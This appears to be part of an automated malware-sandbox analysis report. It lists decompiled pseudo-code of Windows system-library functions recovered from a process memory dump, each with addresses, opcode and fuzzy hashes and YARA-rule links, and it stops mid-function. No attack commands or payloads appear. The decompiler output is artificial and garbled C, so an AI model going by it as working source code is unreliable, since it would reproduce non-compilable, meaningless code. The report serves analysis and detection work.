                                          • Instruction Fuzzy Hash: CA11C276904208BBC715DF6DD8808BEBBB9EF95304F1080AEF9848B350DA359D55D7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E37F5, Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E033E37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E033C2280(_t6, 0x3498550);
				}
				_t29 = E033E387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E033BFFB0(0x3498550, _t27, 0x3498550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                          0x033e37fa
                                          0x033e37fc
                                          0x033e3805
                                          0x033e3808
                                          0x033e3808
                                          0x033e3814
                                          0x033e3818
                                          0x033e3846
                                          0x033e3848
                                          0x033e384b
                                          0x033e384b
                                          0x033e3852
                                          0x00000000
                                          0x033e3854
                                          0x033e3856
                                          0x00000000
                                          0x00000000
                                          0x033e3863
                                          0x00000000
                                          0x033e3863
                                          0x033e381a
                                          0x033e381a
                                          0x033e381f
                                          0x033e386e
                                          0x033e386e
                                          0x033e3871
                                          0x033e3873
                                          0x033e3873
                                          0x033e3868
                                          0x00000000
                                          0x033e3868
                                          0x033e3821
                                          0x033e3826
                                          0x00000000
                                          0x00000000
                                          0x033e3828
                                          0x033e382a
                                          0x033e3841
                                          0x00000000
                                          0x033e3841

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bec920bf11769ef4683d2fd3e70fffd4efecfecb4b48c22d2b4e3f6e4bfd51ed
                                          • Instruction ID: fe48498a85fe1df2147e05d3e72f7ee04a6cb010e4ca1af3aa6215da85cd28ba
                                          • Opcode Fuzzy Hash: bec920bf11769ef4683d2fd3e70fffd4efecfecb4b48c22d2b4e3f6e4bfd51ed
                                          • Instruction Fuzzy Hash: 0501C47A9416349BC327CB199DC0E26BBAADFC6A7271940AEE945CF295DB30C805C780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033AC962, Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 42%
                                          			E033AC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x349d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E033BEEF0(0x34970a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0342F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E033BEB70(_t29, 0x34970a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E033EB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0342F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x34970c0; // 0x0
					while(_t38 != 0x34970c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x349b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                          0x033ac96a
                                          0x033ac974
                                          0x033ac988
                                          0x033ac98a
                                          0x03417c9d
                                          0x03417c9f
                                          0x03417ca4
                                          0x03417cae
                                          0x03417cf0
                                          0x03417cf5
                                          0x03417cfa
                                          0x033ac992
                                          0x033ac996
                                          0x033ac997
                                          0x033ac998
                                          0x033ac9a3
                                          0x033ac9a3
                                          0x03417cb0
                                          0x03417cb7
                                          0x03417cbb
                                          0x00000000
                                          0x00000000
                                          0x03417cbd
                                          0x03417ce8
                                          0x03417cc5
                                          0x03417cc8
                                          0x03417cca
                                          0x03417cd0
                                          0x03417cd6
                                          0x03417cde
                                          0x03417ce4
                                          0x03417ce4
                                          0x03417cd0
                                          0x00000000
                                          0x03417ce8
                                          0x033ac990
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c957de41547b9fc91ffa6ce5b89327aeefe8bd77af3ee6a24507a202e4505ecd
                                          • Instruction ID: 2256288dcebb98082db6c9daaecba161d5bb4a36cd4e7d2e5f52c80e39a1afaf
                                          • Opcode Fuzzy Hash: c957de41547b9fc91ffa6ce5b89327aeefe8bd77af3ee6a24507a202e4505ecd
                                          • Instruction Fuzzy Hash: 6711AC31710B069BCB10EF289C85A6BBFE5FB88610B54052BE9469F661EF20EC24C7D5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D002D, Relevance: .1, Instructions: 55COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033D002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E033C7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E033C7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E033C7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E033C7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                          0x033d0032
                                          0x033d0037
                                          0x033d0043
                                          0x03414b3a
                                          0x033d0049
                                          0x033d0049
                                          0x033d0049
                                          0x033d004e
                                          0x033d0053
                                          0x03414b48
                                          0x03414b5a
                                          0x03414b4a
                                          0x03414b53
                                          0x03414b53
                                          0x03414b5f
                                          0x00000000
                                          0x03414b61
                                          0x00000000
                                          0x03414b61
                                          0x033d0059
                                          0x033d0059
                                          0x033d0060
                                          0x03414b6f
                                          0x03414b6f
                                          0x033d0069
                                          0x03414b83
                                          0x00000000
                                          0x00000000
                                          0x03414b90
                                          0x03414b9b
                                          0x03414b9b
                                          0x03414ba4
                                          0x00000000
                                          0x00000000
                                          0x03414baa
                                          0x00000000
                                          0x033d006f
                                          0x033d006f
                                          0x00000000
                                          0x033d006f
                                          0x033d0069

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction ID: 153476ab7b481bf8e112433bf4a55d132b11705eb6abfaebae065c92a854e3ce
                                          • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction Fuzzy Hash: DA11E172601AC09FD722D72AE998B3777A8AB40B94F0D00E1DD058FB92D32CC851C768
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033B766D, Relevance: .1, Instructions: 54COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E033B766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E033DF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E033DF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L033C4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                          0x033b7672
                                          0x033b767f
                                          0x033b7689
                                          0x033b76de
                                          0x033b76de
                                          0x033b768b
                                          0x033b7691
                                          0x033b7693
                                          0x033b7697
                                          0x00000000
                                          0x033b7699
                                          0x033b76a8
                                          0x00000000
                                          0x033b76aa
                                          0x033b76ad
                                          0x033b76b1
                                          0x00000000
                                          0x033b76b3
                                          0x033b76b3
                                          0x033b76b5
                                          0x033b76ba
                                          0x033b76bc
                                          0x033b76bc
                                          0x033b76c0
                                          0x00000000
                                          0x033b76c2
                                          0x033b76ce
                                          0x033b76ce
                                          0x033b76c0
                                          0x033b76b1
                                          0x033b76a8
                                          0x033b7697
                                          0x033b76d9

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction ID: c3d8b23df07a26ccb5356807e8f117c1ff1ee754a5b86bce10d0a7fc7a2e4a4d
                                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction Fuzzy Hash: 8B01B132710218AFC720DE5ECCC1F9BB6BDEFC4660B280124BA09DB640DA20DC0183A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0343C450, Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E0343C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E033E9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E033E95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E033E95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E033E95D0();
				return L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                          0x0343c458
                                          0x0343c45d
                                          0x0343c466
                                          0x0343c468
                                          0x0343c469
                                          0x0343c46a
                                          0x0343c46b
                                          0x0343c46e
                                          0x0343c46f
                                          0x0343c471
                                          0x0343c476
                                          0x0343c476
                                          0x0343c47c
                                          0x0343c47e
                                          0x0343c480
                                          0x0343c480
                                          0x0343c483
                                          0x0343c484
                                          0x0343c486
                                          0x0343c488
                                          0x0343c48f
                                          0x0343c491
                                          0x0343c493
                                          0x0343c493
                                          0x0343c48f
                                          0x0343c498
                                          0x0343c49e
                                          0x0343c4ad
                                          0x0343c4ad
                                          0x0343c4b2
                                          0x0343c4b4
                                          0x0343c4cd

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction ID: 3bea67ee51a989906917e5a8f5d52675f26f0dcaa21e6039f931545dfb35a819
                                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction Fuzzy Hash: 1D01C0B6140609BFD621EF25CCC0E63F76DFB55390F044525F1245B6A0CB25ACA1CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033A9080, Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E033A9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x34985ec;
				E033C2280(_t48, 0x34985ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E033BFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x349538c; // 0x77ad6848
					if( *_t84 != 0x3495388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x347f6e8);
						E033FD0E8(0x34985ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E034788F5(_t80, _t85, 0x3495388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x34986c0; // 0x2f407b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x34986b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E033C2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E034788F5(0x34985ec, _t85, 0x3495388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E033EAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x349b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x34984c0;
																			if(_t82 >=  *0x34984c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E03479063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E033A922A(_t99);
										_t64 = E033C7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E03478B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x34986c0; // 0x2f407b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x34986b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x34986bc;
													_t87 = 0x34986b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E033A9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x34986c4;
												_t87 = 0x34986c0;
												L27:
												E033D9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E033FD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x3495388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x349538c = _t51;
						goto L6;
					}
				}
			}




















                                          0x033a9082
                                          0x033a9083
                                          0x033a9084
                                          0x033a9085
                                          0x033a9087
                                          0x033a9096
                                          0x033a9098
                                          0x033a9098
                                          0x033a909e
                                          0x033a90a8
                                          0x033a90e7
                                          0x033a90e7
                                          0x033a90aa
                                          0x033a90b0
                                          0x033a90b7
                                          0x033a90bd
                                          0x033a90dd
                                          0x033a90e6
                                          0x033a90bf
                                          0x033a90bf
                                          0x033a90c7
                                          0x033a90cf
                                          0x033a90f1
                                          0x033a90f2
                                          0x033a90f4
                                          0x033a90f5
                                          0x033a90f6
                                          0x033a90f7
                                          0x033a90f8
                                          0x033a90f9
                                          0x033a90fa
                                          0x033a90fb
                                          0x033a90fc
                                          0x033a90fd
                                          0x033a90fe
                                          0x033a90ff
                                          0x033a9100
                                          0x033a9102
                                          0x033a9107
                                          0x033a910c
                                          0x033a9110
                                          0x033a9113
                                          0x033a9115
                                          0x033a9136
                                          0x033a913f
                                          0x033a9143
                                          0x034037e4
                                          0x034037e4
                                          0x033a9117
                                          0x033a9117
                                          0x033a911d
                                          0x00000000
                                          0x033a911f
                                          0x033a911f
                                          0x033a9125
                                          0x00000000
                                          0x033a9127
                                          0x033a912d
                                          0x033a9130
                                          0x033a9134
                                          0x033a9158
                                          0x033a915d
                                          0x033a9161
                                          0x033a9168
                                          0x03403715
                                          0x033a916e
                                          0x033a916e
                                          0x033a9175
                                          0x033a9177
                                          0x033a917e
                                          0x033a917f
                                          0x033a9182
                                          0x033a9182
                                          0x033a9187
                                          0x033a9187
                                          0x033a918a
                                          0x033a918d
                                          0x033a918f
                                          0x033a9192
                                          0x033a9195
                                          0x033a9198
                                          0x033a9198
                                          0x033a9198
                                          0x033a919a
                                          0x00000000
                                          0x00000000
                                          0x0340371f
                                          0x03403721
                                          0x03403727
                                          0x0340372f
                                          0x03403733
                                          0x03403735
                                          0x03403738
                                          0x0340373b
                                          0x0340373d
                                          0x03403740
                                          0x00000000
                                          0x03403746
                                          0x03403746
                                          0x03403749
                                          0x00000000
                                          0x0340374f
                                          0x0340374f
                                          0x03403751
                                          0x03403757
                                          0x03403759
                                          0x0340375c
                                          0x0340375c
                                          0x0340375e
                                          0x0340375e
                                          0x03403761
                                          0x03403764
                                          0x00000000
                                          0x00000000
                                          0x03403766
                                          0x03403768
                                          0x034037a3
                                          0x034037a3
                                          0x034037a5
                                          0x034037a7
                                          0x034037ad
                                          0x034037b0
                                          0x034037b2
                                          0x034037bc
                                          0x034037c2
                                          0x034037c2
                                          0x034037b2
                                          0x033a9187
                                          0x033a9187
                                          0x033a918a
                                          0x033a918d
                                          0x033a918f
                                          0x033a9192
                                          0x033a9195
                                          0x00000000
                                          0x033a9195
                                          0x00000000
                                          0x0340376a
                                          0x0340376a
                                          0x0340376a
                                          0x0340376c
                                          0x0340376c
                                          0x0340376f
                                          0x03403775
                                          0x00000000
                                          0x00000000
                                          0x03403777
                                          0x03403779
                                          0x03403782
                                          0x03403787
                                          0x03403789
                                          0x03403790
                                          0x03403790
                                          0x0340378b
                                          0x0340378b
                                          0x0340378b
                                          0x03403792
                                          0x03403795
                                          0x00000000
                                          0x03403795
                                          0x00000000
                                          0x03403779
                                          0x03403798
                                          0x00000000
                                          0x03403798
                                          0x00000000
                                          0x03403768
                                          0x0340379b
                                          0x0340379b
                                          0x03403751
                                          0x03403749
                                          0x00000000
                                          0x03403740
                                          0x033a91a0
                                          0x033a91a3
                                          0x033a91a9
                                          0x033a91b0
                                          0x00000000
                                          0x033a91b0
                                          0x033a9187
                                          0x033a91b4
                                          0x033a91b4
                                          0x033a91bb
                                          0x033a91c0
                                          0x033a91c5
                                          0x033a91c7
                                          0x034037da
                                          0x033a91cd
                                          0x033a91cd
                                          0x033a91cd
                                          0x033a91d2
                                          0x033a91d5
                                          0x033a9239
                                          0x033a9239
                                          0x033a91d7
                                          0x033a91db
                                          0x033a91e1
                                          0x033a91e7
                                          0x033a91fd
                                          0x033a9203
                                          0x033a921e
                                          0x033a9223
                                          0x00000000
                                          0x033a9205
                                          0x033a9205
                                          0x033a9208
                                          0x033a920c
                                          0x033a9214
                                          0x033a9214
                                          0x033a920c
                                          0x033a91e9
                                          0x033a91e9
                                          0x033a91ee
                                          0x033a91f3
                                          0x033a91f3
                                          0x033a91f3
                                          0x033a91e7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033a9134
                                          0x033a9125
                                          0x033a911d
                                          0x033a914e
                                          0x033a90d1
                                          0x033a90d1
                                          0x033a90d3
                                          0x033a90d6
                                          0x033a90d8
                                          0x00000000
                                          0x033a90d8
                                          0x033a90cf

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 92b4c0a981f23d64732e0125eccf8e5d2c4d7f074d904c52727342ab7975515b
                                          • Instruction ID: 7faf43985c15130a92cb63363789d469cec3c642497ee52fe22e8ece8cf853bf
                                          • Opcode Fuzzy Hash: 92b4c0a981f23d64732e0125eccf8e5d2c4d7f074d904c52727342ab7975515b
                                          • Instruction Fuzzy Hash: BC018172901A089FD725DF18DC80B12BBE9EB46360F2541A7E605EF691C778DC41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03474015, Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E03474015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E033C2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E033C2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x34986ac);
					E033AF900(0x34986d4, _t28);
					E033BFFB0(0x34986ac, _t28, 0x34986ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E033BFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                          0x0347401a
                                          0x0347401e
                                          0x03474023
                                          0x03474028
                                          0x03474029
                                          0x0347402b
                                          0x0347402f
                                          0x03474043
                                          0x03474046
                                          0x03474051
                                          0x03474057
                                          0x0347405f
                                          0x03474062
                                          0x03474067
                                          0x0347406f
                                          0x0347407c
                                          0x0347407c
                                          0x0347408c
                                          0x0347408c
                                          0x03474097

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 978d31761dbe951025ef71a780d952b8a3fdf9dda974a107aaf0b9d79280e071
                                          • Instruction ID: 9e442bfd0b7c7b547059af9f774ad1c9751ce5bac3f1a0001e1356add650f10f
                                          • Opcode Fuzzy Hash: 978d31761dbe951025ef71a780d952b8a3fdf9dda974a107aaf0b9d79280e071
                                          • Instruction Fuzzy Hash: 3E018476601A897FD651EB6DCDC4E67F7ACEB45660B00022AB508CBA11CB24EC11CBE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0346138A, Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 61%
                                          			E0346138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x349d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E033EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E033C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
